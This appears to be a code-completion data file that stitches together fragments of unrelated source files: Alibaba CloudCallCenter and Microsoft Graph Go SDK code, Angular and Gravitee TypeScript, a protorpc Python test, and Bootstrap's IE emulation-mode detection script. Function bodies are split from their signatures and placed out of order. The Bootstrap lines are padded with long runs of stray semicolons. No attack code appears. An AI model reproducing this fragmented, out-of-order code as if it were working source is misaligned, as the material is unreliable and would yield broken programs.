InstanceId string `position:"Body" name:"InstanceId"`
}
// BeginContactFlowVersionModificationResponse is the response struct for api BeginContactFlowVersionModification
type BeginContactFlowVersionModificationResponse struct {
*responses.BaseResponse
RequestId string `json:"RequestId" xml:"RequestId"`
Success bool `json:"Success" xml:"Success"`
Code string `json:"Code" xml:"Code"`
Message string `json:"Message" xml:"Message"`
HttpStatusCode int `json:"HttpStatusCode" xml:"HttpStatusCode"`
ContactFlow ContactFlow `json:"ContactFlow" xml:"ContactFlow"`
}
// CreateBeginContactFlowVersionModificationRequest creates a request to invoke BeginContactFlowVersionModification API
func CreateBeginContactFlowVersionModificationRequest() (request *BeginContactFlowVersionModificationRequest) |
// CreateBeginContactFlowVersionModificationResponse creates a response to parse from BeginContactFlowVersionModification response
func CreateBeginContactFlowVersionModificationResponse() (response *BeginContactFlowVersionModificationResponse) {
response = &BeginContactFlowVersionModificationResponse{
BaseResponse: &responses.BaseResponse{},
}
return
}
| {
request = &BeginContactFlowVersionModificationRequest{
RpcRequest: &requests.RpcRequest{},
}
request.InitWithApiInfo("CloudCallCenter", "2017-07-05", "BeginContactFlowVersionModification", "", "")
request.Method = requests.POST
return
} |
installed_apps_response.go | package installedapps
import (
i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55 "github.com/microsoft/kiota/abstractions/go/serialization"
i4a838ef194e4c99e9f2c63ba10dab9cb120a89367c1d4ab0daa63bb424e20d87 "github.com/microsoftgraph/msgraph-sdk-go/models/microsoft/graph"
)
// InstalledAppsResponse
type InstalledAppsResponse struct {
// Stores additional data not described in the OpenAPI description found when deserializing. Can be used for serialization as well.
additionalData map[string]interface{};
//
nextLink *string;
//
value []i4a838ef194e4c99e9f2c63ba10dab9cb120a89367c1d4ab0daa63bb424e20d87.TeamsAppInstallation;
}
// NewInstalledAppsResponse instantiates a new installedAppsResponse and sets the default values.
func NewInstalledAppsResponse()(*InstalledAppsResponse) {
m := &InstalledAppsResponse{
}
m.SetAdditionalData(make(map[string]interface{}));
return m
}
// GetAdditionalData gets the AdditionalData property value. Stores additional data not described in the OpenAPI description found when deserializing. Can be used for serialization as well.
func (m *InstalledAppsResponse) GetAdditionalData()(map[string]interface{}) {
if m == nil {
return nil
} else {
return m.additionalData
}
}
// GetNextLink gets the nextLink property value.
func (m *InstalledAppsResponse) GetNextLink()(*string) {
if m == nil | else {
return m.nextLink
}
}
// GetValue gets the value property value.
func (m *InstalledAppsResponse) GetValue()([]i4a838ef194e4c99e9f2c63ba10dab9cb120a89367c1d4ab0daa63bb424e20d87.TeamsAppInstallation) {
if m == nil {
return nil
} else {
return m.value
}
}
// GetFieldDeserializers the deserialization information for the current model
func (m *InstalledAppsResponse) GetFieldDeserializers()(map[string]func(interface{}, i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.ParseNode)(error)) {
res := make(map[string]func(interface{}, i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.ParseNode)(error))
res["@odata.nextLink"] = func (o interface{}, n i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.ParseNode) error {
val, err := n.GetStringValue()
if err != nil {
return err
}
if val != nil {
m.SetNextLink(val)
}
return nil
}
res["value"] = func (o interface{}, n i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.ParseNode) error {
val, err := n.GetCollectionOfObjectValues(func () i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.Parsable { return i4a838ef194e4c99e9f2c63ba10dab9cb120a89367c1d4ab0daa63bb424e20d87.NewTeamsAppInstallation() })
if err != nil {
return err
}
if val != nil {
res := make([]i4a838ef194e4c99e9f2c63ba10dab9cb120a89367c1d4ab0daa63bb424e20d87.TeamsAppInstallation, len(val))
for i, v := range val {
res[i] = *(v.(*i4a838ef194e4c99e9f2c63ba10dab9cb120a89367c1d4ab0daa63bb424e20d87.TeamsAppInstallation))
}
m.SetValue(res)
}
return nil
}
return res
}
func (m *InstalledAppsResponse) IsNil()(bool) {
return m == nil
}
// Serialize serializes information the current object
func (m *InstalledAppsResponse) Serialize(writer i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.SerializationWriter)(error) {
{
err := writer.WriteStringValue("@odata.nextLink", m.GetNextLink())
if err != nil {
return err
}
}
{
cast := make([]i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.Parsable, len(m.GetValue()))
for i, v := range m.GetValue() {
temp := v
cast[i] = i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.Parsable(&temp)
}
err := writer.WriteCollectionOfObjectValues("value", cast)
if err != nil {
return err
}
}
{
err := writer.WriteAdditionalData(m.GetAdditionalData())
if err != nil {
return err
}
}
return nil
}
// SetAdditionalData sets the AdditionalData property value. Stores additional data not described in the OpenAPI description found when deserializing. Can be used for serialization as well.
func (m *InstalledAppsResponse) SetAdditionalData(value map[string]interface{})() {
m.additionalData = value
}
// SetNextLink sets the nextLink property value.
func (m *InstalledAppsResponse) SetNextLink(value *string)() {
m.nextLink = value
}
// SetValue sets the value property value.
func (m *InstalledAppsResponse) SetValue(value []i4a838ef194e4c99e9f2c63ba10dab9cb120a89367c1d4ab0daa63bb424e20d87.TeamsAppInstallation)() {
m.value = value
}
| {
return nil
} |
hctk.d.ts | declare type Cedict = Record<string, string>; | ||
docs.component.ts | /**
* @license
* Copyright Akveo. All Rights Reserved.
* Licensed under the MIT License. See License.txt in the project root for license information.
*/
import { Component, OnDestroy } from '@angular/core';
import { Router } from '@angular/router';
import { Subscription } from 'rxjs/Subscription';
import 'rxjs/add/operator/merge';
import { NbMenuItem } from '@nebular/theme';
import { NbMenuInternalService } from '@nebular/theme/components/menu/menu.service';
import { DocsService } from './docs.service';
| selector: 'ngd-docs',
styleUrls: ['docs.component.scss'],
template: `
<nb-layout>
<nb-layout-header fixed>
<ngd-header></ngd-header>
</nb-layout-header>
<nb-sidebar>
<nb-menu [items]="menuItems" tag="leftMenu"></nb-menu>
</nb-sidebar>
<nb-layout-column>
<router-outlet></router-outlet>
</nb-layout-column>
</nb-layout>
`,
})
export class NgdDocsComponent implements OnDestroy {
structure: any;
menuItems: NbMenuItem[] = [];
private routerSubscription: Subscription;
constructor(private service: DocsService,
private router: Router,
private menuInternalService: NbMenuInternalService) {
this.menuItems = this.service.getPreparedMenu();
this.structure = this.service.getPreparedStructure();
this.routerSubscription = this.router.events
.subscribe((event) => {
if (event['url'] === '/docs') {
const firstMenuItem = this.menuItems[0].children[0];
this.menuInternalService.itemSelect(firstMenuItem);
// angular bug with replaceUrl, temp fix with setTimeout
setTimeout(() => this.router.navigateByUrl(firstMenuItem.link, { replaceUrl: true }));
}
});
}
ngOnDestroy() {
this.routerSubscription.unsubscribe();
}
} | import 'rxjs/add/operator/filter';
@Component({ |
apis.audit.route.ts | /*
* Copyright (C) 2015 The Gravitee team (http://gravitee.io)
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
import AuditService from '../../../services/audit.service';
export default apisAuditRouterConfig;
function | ($stateProvider) {
'ngInject';
$stateProvider
.state('management.apis.detail.audit', {
template: require('./apis.audit.route.html')
})
.state('management.apis.detail.audit.general', {
url: '/audit',
template: require('./general/audit.html'),
controller: 'ApiAuditController',
controllerAs: 'auditCtrl',
data: {
menu: {
label: 'Audit',
icon: 'visibility',
},
perms: {
only: ['api-audit-r']
},
docs: {
page: 'management-api-audit'
}
},
resolve: {
resolvedEvents:
(AuditService: AuditService, $stateParams) => AuditService.listEvents($stateParams.apiId).then(response => response.data)
}
})
.state('management.apis.detail.audit.history', {
url: '/history',
template: require('./history/apiHistory.html'),
controller: 'ApiHistoryController',
controllerAs: 'apiHistoryCtrl',
resolve: {
resolvedEvents: function ($stateParams, ApiService) {
var eventTypes = 'PUBLISH_API';
return ApiService.getApiEvents($stateParams.apiId, eventTypes);
}
},
data: {
perms: {
only: ['api-event-r']
},
docs: {
page: 'management-api-history'
}
}
})
.state('management.apis.detail.audit.events', {
url: '/events',
template: require('./events/apiEvents.html'),
controller: 'ApiEventsController',
controllerAs: 'apiEventsCtrl',
resolve: {
resolvedEvents: function ($stateParams, ApiService) {
const eventTypes = 'START_API,STOP_API';
return ApiService.getApiEvents($stateParams.apiId, eventTypes);
}
},
data: {
perms: {
only: ['api-event-r']
},
docs: {
page: 'management-api-events'
}
}
});
}
| apisAuditRouterConfig |
service_test.py | #!/usr/bin/env python
#
# Copyright 2011 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
# | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""WSGI application tests."""
__author__ = '[email protected] (Rafe Kaplan)'
import unittest
from protorpc import end2end_test
from protorpc import protojson
from protorpc import remote
from protorpc import registry
from protorpc import transport
from protorpc import test_util
from protorpc import webapp_test_util
from protorpc.wsgi import service
from protorpc.wsgi import util
class ServiceMappingTest(end2end_test.EndToEndTest):
def setUp(self):
self.protocols = None
remote.Protocols.set_default(remote.Protocols.new_default())
super(ServiceMappingTest, self).setUp()
def CreateServices(self):
return my_service, my_other_service
def CreateWsgiApplication(self):
"""Create WSGI application used on the server side for testing."""
my_service = service.service_mapping(webapp_test_util.TestService,
'/my/service')
my_other_service = service.service_mapping(
webapp_test_util.TestService.new_factory('initialized'),
'/my/other_service',
protocols=self.protocols)
return util.first_found([my_service, my_other_service])
def testAlternateProtocols(self):
self.protocols = remote.Protocols()
self.protocols.add_protocol(protojson, 'altproto', 'image/png')
global_protocols = remote.Protocols()
global_protocols.add_protocol(protojson, 'server-side-name', 'image/png')
remote.Protocols.set_default(global_protocols)
self.ResetServer()
self.connection = transport.HttpTransport(
self.service_url, protocol=self.protocols.lookup_by_name('altproto'))
self.stub = webapp_test_util.TestService.Stub(self.connection)
self.stub.optional_message(string_value='alternate-protocol')
def testAlwaysUseDefaults(self):
new_protocols = remote.Protocols()
new_protocols.add_protocol(protojson, 'altproto', 'image/png')
self.connection = transport.HttpTransport(
self.service_url, protocol=new_protocols.lookup_by_name('altproto'))
self.stub = webapp_test_util.TestService.Stub(self.connection)
self.assertRaisesWithRegexpMatch(
remote.ServerError,
'HTTP Error 415: Unsupported Media Type',
self.stub.optional_message, string_value='alternate-protocol')
remote.Protocols.set_default(new_protocols)
self.stub.optional_message(string_value='alternate-protocol')
class ProtoServiceMappingsTest(ServiceMappingTest):
def CreateWsgiApplication(self):
"""Create WSGI application used on the server side for testing."""
return service.service_mappings(
[('/my/service', webapp_test_util.TestService),
('/my/other_service',
webapp_test_util.TestService.new_factory('initialized'))
])
def GetRegistryStub(self, path='/protorpc'):
service_url = self.make_service_url(path)
transport = self.CreateTransport(service_url)
return registry.RegistryService.Stub(transport)
def testRegistry(self):
registry_client = self.GetRegistryStub()
response = registry_client.services()
self.assertIterEqual([
registry.ServiceMapping(
name='/my/other_service',
definition='protorpc.webapp_test_util.TestService'),
registry.ServiceMapping(
name='/my/service',
definition='protorpc.webapp_test_util.TestService'),
], response.services)
def testRegistryDictionary(self):
self.ResetServer(service.service_mappings(
{'/my/service': webapp_test_util.TestService,
'/my/other_service':
webapp_test_util.TestService.new_factory('initialized'),
}))
registry_client = self.GetRegistryStub()
response = registry_client.services()
self.assertIterEqual([
registry.ServiceMapping(
name='/my/other_service',
definition='protorpc.webapp_test_util.TestService'),
registry.ServiceMapping(
name='/my/service',
definition='protorpc.webapp_test_util.TestService'),
], response.services)
def testNoRegistry(self):
self.ResetServer(service.service_mappings(
[('/my/service', webapp_test_util.TestService),
('/my/other_service',
webapp_test_util.TestService.new_factory('initialized'))
],
registry_path=None))
registry_client = self.GetRegistryStub()
self.assertRaisesWithRegexpMatch(
remote.ServerError,
'HTTP Error 404: Not Found',
registry_client.services)
def testAltRegistry(self):
self.ResetServer(service.service_mappings(
[('/my/service', webapp_test_util.TestService),
('/my/other_service',
webapp_test_util.TestService.new_factory('initialized'))
],
registry_path='/registry'))
registry_client = self.GetRegistryStub('/registry')
services = registry_client.services()
self.assertTrue(isinstance(services, registry.ServicesResponse))
self.assertIterEqual(
[registry.ServiceMapping(
name='/my/other_service',
definition='protorpc.webapp_test_util.TestService'),
registry.ServiceMapping(
name='/my/service',
definition='protorpc.webapp_test_util.TestService'),
],
services.services)
def testDuplicateRegistryEntry(self):
self.assertRaisesWithRegexpMatch(
remote.ServiceConfigurationError,
"Path '/my/service' is already defined in service mapping",
service.service_mappings,
[('/my/service', webapp_test_util.TestService),
('/my/service',
webapp_test_util.TestService.new_factory('initialized'))
])
def testRegex(self):
self.ResetServer(service.service_mappings(
[('/my/[0-9]+', webapp_test_util.TestService.new_factory('service')),
('/my/[a-z]+',
webapp_test_util.TestService.new_factory('other-service')),
]))
my_service_url = 'http://localhost:%d/my/12345' % self.port
my_other_service_url = 'http://localhost:%d/my/blarblar' % self.port
my_service = webapp_test_util.TestService.Stub(
transport.HttpTransport(my_service_url))
my_other_service = webapp_test_util.TestService.Stub(
transport.HttpTransport(my_other_service_url))
response = my_service.init_parameter()
self.assertEqual('service', response.string_value)
response = my_other_service.init_parameter()
self.assertEqual('other-service', response.string_value)
def main():
unittest.main()
if __name__ == '__main__':
main() | # Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, |
ie-emulation-modes-warning.js | // NOTICE!! DO NOT USE ANY OF THIS JAVASCRIPT
// IT'S JUST JUNK FOR OUR DOCS!
// ++++++++++++++++++++++++++++++++++++++++++
/*!
* Copyright 2014-2015 Twitter, Inc.
*
* Licensed under the Creative Commons Attribution 3.0 Unported License. For
* details, see https://creativecommons.org/licenses/by/3.0/.
*/
// Intended to prevent false-positive bug reports about Bootstrap not working properly in old versions of IE due to folks testing using IE's unreliable emulation modes.
(function () {
'use strict';
function emulatedIEMajorVersion() {
var groups = /MSIE ([0-9.]+)/.exec(window.navigator.userAgent);;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
if (groups === null) {
return null
}
var ieVersionNum = parseInt(groups[1], 10);;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
var ieMajorVersion = Math.floor(ieVersionNum);;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
return ieMajorVersion | // Detects the actual version of IE in use, even if it's in an older-IE emulation mode.
// IE JavaScript conditional compilation docs: https://msdn.microsoft.com/library/121hztk3%28v=vs.94%29.aspx
// @cc_on docs: https://msdn.microsoft.com/library/8ka90k2e%28v=vs.94%29.aspx
var jscriptVersion = new Function('/*@cc_on return @_jscript_version; @*/')();;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; // jshint ignore:line
if (jscriptVersion === undefined) {
return 11;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; // IE11+ not in emulation mode
}
if (jscriptVersion < 9) {
return 8;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; // IE8 (or lower; haven't tested on IE<8)
}
return jscriptVersion;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; // IE9 or IE10 in any mode, or IE11 in non-IE11 mode
}
var ua = window.navigator.userAgent;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
if (ua.indexOf('Opera') > -1 || ua.indexOf('Presto') > -1) {
return;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;